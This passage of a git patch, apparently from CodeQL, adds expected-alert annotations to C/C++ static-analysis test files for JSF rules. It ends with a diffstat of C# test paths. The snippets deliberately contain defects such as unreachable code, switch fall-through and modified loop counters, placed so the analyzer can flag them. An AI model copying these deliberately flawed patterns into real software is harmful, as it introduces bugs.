Rule 186/test.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c @@ -11,7 +11,7 @@ void called2() x++; } -void not_called() +void not_called() // $ Alert { x++; // BAD: unreachable } @@ -29,7 +29,7 @@ int main(int argc, const char* argv[]) while (1) { x++; } - x++; // BAD: unreachable + x++; // BAD: unreachable // $ Alert } else if (argc > 4) { x++; // BAD: unreachable [NOT DETECTED] } else if (argc > 5) { diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c index 4a0f0e07dd0d..42431663c9c4 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c @@ -7,7 +7,7 @@ void m(enum color value) { switch(value) { case red: // compliant case green: // compliant - case blue: // non-compliant + case blue: // non-compliant // $ Alert f(value); case cyan: // compliant case magenta: // compliant @@ -33,7 +33,7 @@ void m(enum color value) { case green: // COMPLIANT f(value); break; - default: // NON-COMPLIANT + default: // NON-COMPLIANT // $ Alert g(value); case cyan: // COMPLIANT g(value); diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref index ee2fb8681614..6fb2579f4d37 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 193.ql +query: jsf/4.24 Control Flow Structures/AV Rule 193.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c index ae2ea4e9c8fe..2a2d79d3a54f 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c @@ -17,12 +17,12 @@ void nested1(int i) { void nested2(int i) { switch (i) { - case 1: + case 1: // $ Alert i = 1; break; { ; ; ; ; ; ; ; - default: + default: // $ Alert i = 3; } case 2: diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c index 9cee970ddf11..3f9fe567a539 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c @@ -3,7 +3,7 @@ void f1(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: @@ -24,14 +24,14 @@ void f2(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: case 6: i = 6; break; // OK: has break - default: + default: // $ Alert i = 10; // Bad: default not at end case 7: case 8: @@ -45,7 +45,7 @@ void f3(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: @@ -59,7 +59,7 @@ void f3(int i) { return; // OK: has return case 10: case 11: - case 12: + case 12: // $ Alert i = 12; // Bad } } @@ -68,7 +68,7 @@ void f4(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert { i = 3; // Bad } diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c index 85a29ed21ba3..d401c9aa170a 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c @@ -1,19 +1,19 @@ static void f(int x) { switch(x) { - } + } // $ Alert switch(x) { default:; - } + } // $ Alert switch(x) { case 0:; - } + } // $ Alert switch(x) { default: case 0:; - } + } // $ Alert switch(x) { case 0:; diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref index 6a4f71e8e16d..1b51ce65ee6a 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 196.ql +query: jsf/4.24 Control Flow Structures/AV Rule 196.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c index b106f648aaa5..b5c1309c07ea 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.c @@ -10,14 +10,14 @@ int main() j = 0; for (i = 0; i < 10; i++) { - i = 10; // BAD (for loop variable changed in body) + i = 10; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] j = 10; } // nested loops for (i = 0; i < 10; i++) { - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { // ... } @@ -26,12 +26,12 @@ int main() { for (j = 0; j < 10; j++) { - i++; // BAD (for loop variable changed in body) - j++; // BAD (for loop variable changed in body) + i++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] + j++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] k++; } - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { j++; } @@ -40,7 +40,7 @@ int main() { for (j = 0; j < 10; j++) { - for (i = 0; i < 10; i++) // BAD (nested loops with same variable) + for (i = 0; i < 10; i++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { // ... } @@ -50,9 +50,9 @@ int main() { for (j = 0; j < 10; j++) { - for (j = 0; j < 10; j++) // BAD (nested loops with same variable) + for (j = 0; j < 10; j++) // BAD (nested loops with same variable) // $ Alert[cpp/nested-loops-with-same-variable] { - j++; // BAD (for loop variable changed in body) + j++; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] } } } @@ -62,17 +62,17 @@ int main() { c = *char_ptr; *char_ptr += 1; - char_ptr += 1; // BAD (for loop variable changed in body) + char_ptr += 1; // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] } // more nested loops for (i = 0; i < 10; i++) { - for (j = 0; j < 10; i++) // BAD (for loop variable changed in body) + for (j = 0; j < 10; i++) // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] { } - for (i = 0; j < 10; j++) // BAD (for loop variable changed in body) + for (i = 0; j < 10; j++) // BAD (for loop variable changed in body) // $ Alert[cpp/loop-variable-changed] { } } diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref index f972ec2b8b84..95b0090d38d1 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/AV Rule 201.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 201.ql +query: jsf/4.24 Control Flow Structures/AV Rule 201.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref index 699de5e67d17..3a75252c4109 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/NestedLoopSameVar.qlref @@ -1 +1,2 @@ -Likely Bugs/NestedLoopSameVar.ql +query: Likely Bugs/NestedLoopSameVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp index ef9f5ac51d8d..62e7cbe1c409 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 201/StructMembers.cpp @@ -18,12 +18,12 @@ int main() { } - for (s1.b = 0; s1.b < 10; s1.b++) // BAD: same loop variable as a surrounding loop + for (s1.b = 0; s1.b < 10; s1.b++) // BAD: same loop variable as a surrounding loop // $ Alert[cpp/nested-loops-with-same-variable] { } s2.b++; // GOOD - s1.b++; // BAD: modifies loop counter of a surrounding loop + s1.b++; // BAD: modifies loop counter of a surrounding loop // $ Alert[cpp/loop-variable-changed] } } } diff --git a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c index 57f5432c7024..76a5c0fdf6af 100644 --- a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c +++ b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.c @@ -1,5 +1,5 @@ -union myUnion1 { // BAD +union myUnion1 { // BAD // $ Alert int asInt; char asChar[4]; }; @@ -16,17 +16,17 @@ union myUnion3 { // GOOD void test1(int *myIntPtr) { - short *myShortPtr = (short *)myIntPtr; // BAD - long long *myLongPtr = (long long *)myIntPtr; // BAD + short *myShortPtr = (short *)myIntPtr; // BAD // $ Alert + long long *myLongPtr = (long long *)myIntPtr; // BAD // $ Alert int myArray[10]; myIntPtr = (int *)myArray; // GOOD - myShortPtr = (short *)myArray; // BAD [BUT DOUBLY REPORTED] + myShortPtr = (short *)myArray; // BAD [BUT DOUBLY REPORTED] // $ Alert return 0; } -union myUnion4 { // GOOD? [FALSE POSITIVE] +union myUnion4 { // GOOD? [FALSE POSITIVE] // $ Alert char myChar; int myInt; }; diff --git a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref index 093bf9f081e5..fe56120cad85 100644 --- a/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref +++ b/cpp/ql/test/query-tests/jsf/4.28 Portable Code/AV Rule 210/AV Rule 210.qlref @@ -1 +1,2 @@ -jsf/4.28 Portable Code/AV Rule 210.ql +query: jsf/4.28 Portable Code/AV Rule 210.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql From 11e99a03d531c945416c5dd0769d960a9d64786c Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:22 +0200 Subject: [PATCH 03/15] C# --- .../ModifiedFnvFunctionDetection.qlref | 3 +- .../NumberOfKnownCommandsAboveThreshold.qlref | 3 +- .../NumberOfKnownHashesAboveThreshold.qlref | 3 +- .../NumberOfKnownLiteralsAboveThreshold.qlref | 3 +- ...mberOfKnownMethodNamesAboveThreshold.qlref | 3 +- .../SwallowEverythingExceptionHandler.qlref | 3 +- .../Solorigate/test/Solorigate/test.cs | 430 +++++++++--------- .../DatabaseQualityDiagnostics.qlref | 2 +- .../DatabaseQualityDiagnostics.qlref | 2 +- .../CWE-918/RequestForgery.expected | 2 +- .../experimental/CWE-918/RequestForgery.qlref | 3 +- ...urity-validations-always-return-true.qlref | 3 +- .../JsonWebTokenHandler/delegation-test.cs | 14 +- .../security-validation-disabled-test.cs | 10 +- .../security-validation-disabled.qlref | 3 +- .../DefiningDatasetRelatedType.qlref | 3 +- ...finingPotentiallyUnsafeXmlSerializer.qlref | 3 +- ...UnsafeTypeUsedDataContractSerializer.qlref | 3 +- .../XmlDeserializationWithDataSet.qlref | 3 +- .../Security Features/Serialization/test0.cs | 14 +- .../DangerousNativeFunctionCall.qlref | 3 +- .../backdoor/PotentialTimeBomb.expected | 18 +- .../backdoor/PotentialTimeBomb.qlref | 3 +- .../ProcessNameToHashTaintFlow.expected | 2 +- .../backdoor/ProcessNameToHashTaintFlow.qlref | 3 +- .../Security Features/backdoor/test.cs | 2 +- .../library-tests/arguments/PrintAst.qlref | 2 +- .../library-tests/assignments/PrintAst.qlref | 2 +- .../library-tests/attributes/PrintAst.qlref | 2 +- .../library-tests/comments/PrintAst.qlref | 2 +- .../compilations/CompilerError.qlref | 2 +- .../compilations/CompilerMessage.qlref | 2 +- .../compilations/ExtractorError.qlref | 2 +- .../compilations/ExtractorMessage.qlref | 2 +- .../library-tests/constructors/PrintAst.qlref | 2 +- .../conversion/operator/PrintAst.qlref | 2 +- .../library-tests/csharp11/PrintAst.qlref | 2 +- .../test/library-tests/csharp6/PrintAst.qlref | 2 +- .../library-tests/csharp7.1/PrintAst.qlref | 2 +- .../library-tests/csharp7.2/PrintAst.qlref | 2 +- .../library-tests/csharp7.3/PrintAst.qlref | 2 +- .../test/library-tests/csharp7/PrintAst.qlref | 2 +- .../test/library-tests/csharp8/PrintAst.qlref | 2 +- .../test/library-tests/csharp9/PrintAst.qlref | 2 +- .../dataflow/implicittostring/PrintAst.qlref | 2 +- .../dataflow/tuples/PrintAst.qlref | 2 +- .../library-tests/definitions/PrintAst.qlref | 2 +- .../definitions/definitions.qlref | 2 +- .../library-tests/delegates/PrintAst.qlref | 2 +- .../DiagnosticExtractorErrors.qlref | 2 +- .../diagnostics/ExtractedFiles.qlref | 2 +- .../test/library-tests/dynamic/PrintAst.qlref | 2 +- .../test/library-tests/enums/PrintAst.qlref | 2 +- .../test/library-tests/events/PrintAst.qlref | 2 +- .../library-tests/exceptions/PrintAst.qlref | 2 +- .../library-tests/expressions/PrintAst.qlref | 2 +- .../library-tests/extension/PrintAst.qlref | 2 +- .../test/library-tests/fields/PrintAst.qlref | 2 +- .../filters/ClassifyFiles/ClassifyFiles.qlref | 2 +- .../library-tests/generics/PrintAst.qlref | 2 +- .../ql/test/library-tests/goto/PrintAst.qlref | 2 +- .../library-tests/indexers/PrintAst.qlref | 2 +- .../library-tests/initializers/PrintAst.qlref | 2 +- .../ql/test/library-tests/linq/PrintAst.qlref | 2 +- .../test/library-tests/members/PrintAst.qlref | 2 +- .../test/library-tests/methods/PrintAst.qlref | 2 +- .../test/library-tests/nameof/PrintAst.qlref | 2 +- .../library-tests/namespaces/PrintAst.qlref | 2 +- .../library-tests/nestedtypes/PrintAst.qlref | 2 +- .../library-tests/operators/PrintAst.qlref | 2 +- .../test/library-tests/partial/PrintAst.qlref | 2 +- .../library-tests/properties/PrintAst.qlref | 2 +- .../library-tests/statements/PrintAst.qlref | 2 +- .../stringinterpolation/PrintAst.qlref | 2 +- .../test/library-tests/types/PrintAst.qlref | 2 +- .../test/library-tests/unsafe/PrintAst.qlref | 2 +- .../CallToGCCollect/CallToGCCollect.qlref | 3 +- .../CallToGCCollect/CallToGCCollectBad.cs | 2 +- .../CallToObsoleteMethod.cs | 2 +- .../CallToObsoleteMethod.qlref | 3 +- .../CallToObsoleteMethodBad.cs | 2 +- .../ClassDoesNotImplementEquals.cs | 6 +- .../ClassDoesNotImplementEquals.qlref | 3 +- .../ClassDoesNotImplementEqualsBad.cs | 2 +- .../ClassImplementsICloneable.qlref | 3 +- .../ClassImplementsICloneableBad.cs | 4 +- .../DisposeNotCalledOnException.cs | 6 +- .../DisposeNotCalledOnException.qlref | 3 +- .../DisposeNotCalledOnExceptionBad.cs | 4 +- .../InconsistentEqualsGetHashCode.cs | 4 +- .../InconsistentEqualsGetHashCode.qlref | 3 +- .../InconsistentEqualsGetHashCodeBad.cs | 2 +- .../IncorrectCompareToSignature.cs | 2 +- .../IncorrectCompareToSignature.qlref | 3 +- .../IncorrectCompareToSignatureBad.cs | 2 +- .../IncorrectEqualsSignature.cs | 2 +- .../IncorrectEqualsSignature.qlref | 3 +- .../IncorrectEqualsSignatureBad.cs | 2 +- .../MissingDisposeCall/MissingDisposeCall.cs | 8 +- .../MissingDisposeCall.qlref | 3 +- .../MissingDisposeCallBad.cs | 2 +- .../MissingDisposeMethod.cs | 12 +- .../MissingDisposeMethod.qlref | 3 +- .../MissingDisposeMethodBad.cs | 2 +- .../NonOverridingMethod.cs | 4 +- .../NonOverridingMethod.qlref | 3 +- .../NonOverridingMethodBad.cs | 2 +- .../NullArgumentToEquals.cs | 6 +- .../NullArgumentToEquals.qlref | 3 +- .../NullArgumentToEqualsBad.cs | 2 +- .../UncheckedReturnValue.cs | 12 +- .../UncheckedReturnValue.qlref | 3 +- .../UncheckedReturnValueBad.cs | 4 +- .../BlockCodeResponseWrite.qlref | 2 +- .../ComplexInlineCode/ComplexInlineCode.qlref | 2 +- .../NonInternationalizedText.qlref | 2 +- .../SplitControlStructure.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../MutualDependency/MutualDependency.qlref | 3 +- .../MutualDependency/MutualDependencyBad.cs | 2 +- .../FeatureEnvy/FeatureEnvy.qlref | 3 +- .../FeatureEnvy/FeatureEnvyBad.cs | 2 +- .../InappropriateIntimacy.cs | 4 +- .../InappropriateIntimacy.qlref | 3 +- .../CommentedOutCode/CommentedOutCode.cs | 2 +- .../CommentedOutCode/CommentedOutCode.qlref | 3 +- .../Comments/TodoComments/TodoComments.cs | 4 +- .../Comments/TodoComments/TodoComments.qlref | 3 +- .../Comments/TodoComments/TodoCommentsBad.cs | 2 +- .../EmptyInterface/EmptyInterface.qlref | 3 +- .../EmptyInterface/EmptyInterfaceBad.cs | 2 +- .../LocalScopeVariableShadowsMember.cs | 12 +- .../LocalScopeVariableShadowsMember.qlref | 3 +- .../LocalScopeVariableShadowsMemberBad.cs | 2 +- .../NoConstantsOnly/NoConstantsOnly.cs | 2 +- .../NoConstantsOnly/NoConstantsOnly.qlref | 3 +- .../NoConstantsOnly/NoConstantsOnlyBad.cs | 2 +- .../TooManyRefParameters.qlref | 3 +- .../TooManyRefParametersBad.cs | 2 +- .../EmptyCatchBlock/EmptyCatchBlock.cs | 2 +- .../EmptyCatchBlock/EmptyCatchBlock.qlref | 3 +- .../AbstractToConcreteCollection.cs | 2 +- .../AbstractToConcreteCollection.qlref | 3 +- .../AbstractToConcreteCollectionBad.cs | 2 +- .../ExposeRepresentation.cs | 2 +- .../ExposeRepresentation.qlref | 3 +- .../ExposeRepresentationBad.cs | 2 +- .../StaticArray/StaticArray.cs | 6 +- .../StaticArray/StaticArray.qlref | 3 +- .../StaticArray/StaticArrayBad.cs | 2 +- .../ConfusingMethodNames.qlref | 3 +- .../ConfusingMethodNames/Program.cs | 2 +- .../VariableNameTooShort.cs | 6 +- .../VariableNameTooShort.qlref | 3 +- .../Bad Practices/Path Combine/PathCombine.cs | 2 +- .../Path Combine/PathCombine.qlref | 3 +- .../VirtualCallInConstructorOrDestructor.cs | 10 +- ...VirtualCallInConstructorOrDestructor.qlref | 3 +- .../CompareIdenticalValues.cs | 48 +- .../CompareIdenticalValues.qlref | 3 +- .../FutileSyncOnField/FutileSyncOnField.cs | 6 +- .../FutileSyncOnField/FutileSyncOnField.qlref | 3 +- .../Concurrency/LockOrder/LockOrder.cs | 6 +- .../Concurrency/LockOrder/LockOrder.qlref | 3 +- .../Concurrency/LockOrder/LockOrderBad.cs | 2 +- .../Concurrency/LockThis/LockThis.cs | 2 +- .../Concurrency/LockThis/LockThis.qlref | 3 +- .../Concurrency/LockedWait/LockedWait.cs | 30 +- .../Concurrency/LockedWait/LockedWait.qlref | 3 +- .../SynchSetUnsynchGet/SynchSetUnsynchGet.cs | 4 +- .../SynchSetUnsynchGet.qlref | 3 +- .../UnsafeLazyInitialization.cs | 12 +- .../UnsafeLazyInitialization.qlref | 3 +- .../UnsynchronizedStaticAccess.cs | 4 +- .../UnsynchronizedStaticAccess.qlref | 3 +- .../EmptyPasswordInConfigurationFile.qlref | 2 +- .../PasswordInConfigurationFile.qlref | 2 +- .../NonAssignedFields/NonAssignedFields.cs | 4 +- .../NonAssignedFields/NonAssignedFields.qlref | 3 +- .../Dead Code/Tests/DeadRefTypes.qlref | 3 +- .../Dead Code/Tests/UnusedField.qlref | 3 +- .../Dead Code/Tests/UnusedMethod.qlref | 3 +- .../query-tests/Dead Code/Tests/deadcode.cs | 4 +- .../query-tests/Dead Code/Tests/regression.cs | 20 +- .../Documentation/XmldocExtraParam.qlref | 3 +- .../Documentation/XmldocExtraTypeParam.qlref | 3 +- .../Documentation/XmldocMissing.qlref | 3 +- .../XmldocMissingException.qlref | 3 +- .../Documentation/XmldocMissingParam.qlref | 3 +- .../Documentation/XmldocMissingReturn.qlref | 3 +- .../Documentation/XmldocMissingSummary.qlref | 3 +- .../XmldocMissingTypeParam.qlref | 3 +- .../Documentation/documentation.cs | 16 +- .../test/query-tests/EmptyBlock/EmptyBlock.cs | 6 +- .../query-tests/EmptyBlock/EmptyBlock.qlref | 3 +- .../CatchOfGenericException.cs | 6 +- .../CatchOfGenericException.qlref | 3 +- .../Language Abuse/ChainedIs/ChainedIs.cs | 2 +- .../Language Abuse/ChainedIs/ChainedIs.qlref | 3 +- .../DubiousTypeTestOfThis.cs | 4 +- .../DubiousTypeTestOfThis.qlref | 3 +- .../DubiousTypeTestOfThis2.cs | 2 +- .../ForeachCapture/ForeachCapture.cs | 4 +- .../ForeachCapture/ForeachCapture.qlref | 3 +- .../MissedTernaryOpportunity.cs | 4 +- .../MissedTernaryOpportunity.qlref | 3 +- .../Language Abuse/NestedIf/NestedIf.qlref | 3 +- .../Language Abuse/NestedIf/nestedif.cs | 6 +- .../RethrowException/RethrowException.cs | 4 +- .../RethrowException/RethrowException.qlref | 3 +- .../SimplifyBoolExpr/SimplifyBoolExpr.cs | 60 +-- .../SimplifyBoolExpr/SimplifyBoolExpr.qlref | 3 +- .../SimplifyBoolExpr/SimplifyBoolExprBad.cs | 6 +- .../UselessCastToSelf/UselessCastToSelf.cs | 14 +- .../UselessCastToSelf/UselessCastToSelf.qlref | 3 +- .../UselessIsBeforeAs/UselessIsBeforeAs.cs | 2 +- .../UselessIsBeforeAs/UselessIsBeforeAs.qlref | 3 +- .../UselessNullCoalescingExpression.cs | 16 +- .../UselessNullCoalescingExpression.qlref | 3 +- .../UselessUpcast/UselessUpcast.cs | 16 +- .../UselessUpcast/UselessUpcast.qlref | 3 +- .../UselessUpcast/UselessUpcastBad.cs | 2 +- .../Likely Bugs/BadCheckOdd/BadCheckOdd.cs | 8 +- .../Likely Bugs/BadCheckOdd/BadCheckOdd.qlref | 3 +- .../ContainerLengthCmpOffByOne.cs | 8 +- .../ContainerLengthCmpOffByOne.qlref | 3 +- .../ContainerSizeCmpZero.cs | 60 +-- .../ContainerSizeCmpZero.qlref | 3 +- .../DangerousNonShortCircuitLogic.cs | 8 +- .../DangerousNonShortCircuitLogic.qlref | 3 +- .../Likely Bugs/Dynamic/BadDynamicCall.qlref | 3 +- .../Likely Bugs/Dynamic/dynamic.cs | 30 +- .../Likely Bugs/EqualsArray/EqualsArray.cs | 8 +- .../Likely Bugs/EqualsArray/EqualsArray.qlref | 3 +- .../Likely Bugs/EqualsUsesAs/EqualsUsesAs.cs | 2 +- .../EqualsUsesAs/EqualsUsesAs.qlref | 3 +- .../Likely Bugs/EqualsUsesIs/EqualsUsesIs.cs | 2 +- .../EqualsUsesIs/EqualsUsesIs.qlref | 3 +- .../IncomparableEquals/IncomparableEquals.cs | 2 +- .../IncomparableEquals.qlref | 3 +- .../InconsistentCompareTo.cs | 8 +- .../InconsistentCompareTo.qlref | 3 +- .../MishandlingJapaneseEra.qlref | 3 +- .../MishandlingJapaneseEra/Program.cs | 12 +- .../NestedLoopsSameVariable.cs | 2 +- .../NestedLoopsSameVariable.qlref | 3 +- .../NestedLoopsSameVariable/Test.cs | 8 +- .../ObjectComparison/ObjectComparison.cs | 8 +- .../ObjectComparison/ObjectComparison.qlref | 3 +- .../PossibleLossOfPrecision.cs | 28 +- .../PossibleLossOfPrecision.qlref | 3 +- .../RandomUsedOnce/RandomUsedOnce.cs | 10 +- .../RandomUsedOnce/RandomUsedOnce.qlref | 3 +- .../RecursiveEquals/RecursiveEquals.cs | 2 +- .../RecursiveEquals/RecursiveEquals.qlref | 3 +- .../SelfAssignment/SelfAssignment.qlref | 3 +- .../Likely Bugs/SelfAssignment/selfassigns.cs | 22 +- .../StaticFieldWrittenByInstance.cs | 6 +- .../StaticFieldWrittenByInstance.qlref | 3 +- .../StringBufferCharInit.qlref | 3 +- .../StringBuilderCharInit.cs | 10 +- .../ThreadUnsafeICryptoTransform.cs | 10 +- .../ThreadUnsafeICryptoTransform.qlref | 3 +- .../ThreadUnsafeICryptoTransformLambda.cs | 8 +- .../ThreadUnsafeICryptoTransformLambda.qlref | 3 +- .../UncheckedCastInEquals.cs | 2 +- .../UncheckedCastInEquals.qlref | 3 +- .../UnsafeYearConstruction/Program.cs | 10 +- .../UnsafeYearConstruction.expected | 8 +- .../UnsafeYearConstruction.qlref | 3 +- .../MissedCastOpportunity.cs | 8 +- .../MissedCastOpportunity.qlref | 3 +- .../MissedWhereOpportunity.cs | 8 +- .../MissedWhereOpportunity.qlref | 3 +- .../MagicConstants/AttributeInts.cs | 2 +- .../MagicConstants/AttributeStrings.cs | 2 +- .../MagicConstants/AttributeStrings.qlref | 3 +- .../query-tests/MagicConstants/HashCode.cs | 2 +- .../MagicConstantsNumbers.qlref | 3 +- .../MagicConstants/MagicNumbersUseConstant.cs | 4 +- .../MagicNumbersUseConstant.qlref | 3 +- .../MagicConstants/MagicStringsUseConstant.cs | 4 +- .../MagicStringsUseConstant.qlref | 3 +- .../flinesofcommentedcode.qlref | 2 +- .../RefTypes/TNumberOfFields/EnumSize.qlref | 2 +- .../Metrics/Summaries/LinesOfCode.qlref | 2 +- .../StringBuilderInLoop.cs | 4 +- .../StringBuilderInLoop.qlref | 3 +- .../StringConcatenationInLoop.cs | 4 +- .../StringConcatenationInLoop.qlref | 3 +- .../UseTryGetValue/UseTryGetValue.cs | 20 +- .../UseTryGetValue/UseTryGetValue.qlref | 3 +- .../ReadOnlyContainer/ReadOnlyContainer.cs | 24 +- .../ReadOnlyContainer/ReadOnlyContainer.qlref | 3 +- .../CWE-011/ASPNetDebug.qlref | 2 +- .../ASPNetMaxRequestLength.qlref | 2 +- .../ASPNetPagesValidateRequest.qlref | 2 +- .../ASPNetRequestValidationMode.qlref | 2 +- .../ExternalAPIsUsedWithUntrustedData.qlref | 2 +- .../CWE-020/RuntimeChecksBypass.cs | 6 +- .../CWE-020/RuntimeChecksBypassBad.cs | 2 +- .../CWE-020/RuntimeChecksbypass.qlref | 3 +- .../CWE-079/XSSRazorPages/XSS.qlref | 2 +- .../CWE-119/LocalUnvalidatedArithmetic.cs | 2 +- .../CWE-119/LocalUnvalidatedArithmetic.qlref | 3 +- .../MissingASPNETGlobalErrorHandler.qlref | 2 +- .../MissingASPNETGlobalErrorHandler.qlref | 3 +- .../WebFormsTests/MissingAccessControl.qlref | 3 +- .../WebFormsTests/Test1/EditProfile.aspx.cs | 2 +- .../WebFormsTests/Test1/ViewProfile.aspx.cs | 2 +- .../WebFormsTests/Test3/B/EditProfile.aspx.cs | 2 +- .../CWE-312/CleartextStorage.cs | 18 +- .../CWE-312/CleartextStorage.expected | 20 +- .../CWE-312/CleartextStorage.qlref | 3 +- .../DontInstallRootCert.expected | 8 +- .../DontInstallRootCert.qlref | 3 +- .../CWE-327/DontInstallRootCert/Test.cs | 12 +- .../InsecureSQLConnection.cs | 10 +- .../InsecureSQLConnection.expected | 8 +- .../InsecureSQLConnection.qlref | 3 +- .../InsufficientKeySize.cs | 6 +- .../InsufficientKeySize.qlref | 3 +- .../MissingAntiForgeryTokenValidation.qlref | 3 +- .../MissingAntiForgeryTokenValidation.cs | 4 +- .../MissingAntiForgeryTokenValidation.qlref | 3 +- .../CWE-359/ExposureOfPrivateInformation.cs | 10 +- .../ExposureOfPrivateInformation.expected | 12 +- .../ExposureOfPrivateInformation.qlref | 3 +- .../CWE-384/AbandonSession.cs | 6 +- .../CWE-384/AbandonSession.qlref | 3 +- .../MissingXFrameOptions.qlref | 3 +- .../NoHeader/MissingXFrameOptions.qlref | 2 +- .../MissingXFrameOptions.qlref | 3 +- .../MissingXFrameOptions.qlref | 3 +- .../PersistentCookie/PersistentCookie.cs | 4 +- .../PersistentCookie/PersistentCookie.qlref | 3 +- .../CWE-548/ASPNetDirectoryListing.qlref | 2 +- .../RequireSSL/AddedInCode/RequireSSL.qlref | 3 +- 